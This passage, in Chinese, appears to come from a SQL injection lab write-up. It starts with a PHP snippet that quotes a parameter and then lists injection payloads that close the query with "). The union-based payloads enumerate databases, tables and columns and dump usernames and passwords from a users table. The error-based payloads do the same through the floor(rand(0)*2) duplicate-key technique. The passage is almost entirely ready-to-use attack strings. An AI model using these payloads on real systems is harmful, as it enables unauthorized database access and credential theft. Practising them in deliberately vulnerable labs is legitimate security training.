

$id='"' .$id. '"';
echo $id;

后面带入查询语句的时候 还加了()   ,所有我们的payload如下

一、 union 查询

查询字段:") order by 3--+

查询当前数据库:") union select 1,database(),3--+

 查询所有数据库:") union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

查询security数据库下的所有表:") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),3--+

查询users表下的所有字段:") union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),3--+

查询username,password 的具体值:") union select 1,(select group_concat(username,0x3a,password) from users),3--+


查询数据库  Limit  来控制:") and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

爆表 Limit控制:") and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

爆字段:") and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

爆内容:") and (select 1 from (select count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+



